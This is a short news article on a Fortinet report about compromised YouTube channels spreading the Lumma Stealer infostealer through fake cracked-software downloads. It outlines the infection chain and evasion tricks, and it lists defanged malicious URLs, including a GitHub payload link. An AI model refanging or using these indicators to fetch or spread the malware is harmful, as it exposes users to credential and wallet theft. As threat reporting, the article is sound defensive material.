Skip to content

YouTube channels exploited for Lumma Stealer distribution

  • by
  • 3 min read

Threat actors are deploying YouTube channels as a clandestine conduit for disseminating a variant of Lumma Stealer.

The attackers strategically compromised YouTube accounts, disgusting their activities by uploading videos seemingly offering cracked software applications. These videos contain embedded malicious URLs, enticing users to download a ZIP file cleverly named ‘’

Attackers regularly update the files on open-source platforms like GitHub and MediaFire to avoid detection.

Cybersecurity researchers from Fortinet exposed the attack chain. Upon downloading the ZIP file, victims unknowingly initiate a multi-stage attack. An LNK file within ZIP calls PowerShell to fetch a private .NET loader from a GitHub repository named ‘New,’ owned by an individual whom the researchers identified as John132456. The malicious payload is discreetly downloaded from a shortened URL, ‘hxxp://cutt[.]ly/lwD7B7lp,’ leading to the initial vector, ‘hxxps://github[.]com/John1323456/New/raw/main/Installer-Install-2023_v0y.6.6[.]exe.’

Lumma Stealer attack chain. | Source: Fortinet

The .NET loader, obfuscated with SmartAssembly, employs advanced techniques to evade detection. It leverages PowerShell to execute discreetly, employing properties like RedirectStandardInput, CreateNoWindow, and UseShellExecute to run without displaying a command prompt window.

The PowerShell script, extracted by the loader, dynamically fetches encrypted binary data from multiple servers based on the system date. It then decrypts and decompresses the data, obtaining a DLL file for the next stage.

The DLL file, ‘Agacantwhitey.dll,’ is crucial to Lumma Stealer’s attack chain. It employs anti-VM and anti-debugging techniques, examining the environment, active windows, sandbox, usernames, and virtualisation platforms to ensure stealth.

Malicious YouTube channel delivering Lumma Stealer. | Source: Fortinet

The Lumma Stealer variant, written in C language and sold on underground platforms, exfiltrates sensitive information from the victim’s system, including browsers, crypto wallets, and browser extensions. It establishes communication with a command and control server to enhance evasion, now using HTTPS for data exfiltration.

Threat actors have used various delivery methods to distribute Lumma Stealer. In October, we reported that hackers use Discord’s Content Delivery Network to disseminate Lumma Stealer.

Researchers have cautioned users to avoid clicking on random links on the internet and avoid downloading files from unauthorized sources.

In the News: WiFi Alliance has begun certifying devices with WiFi 7

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: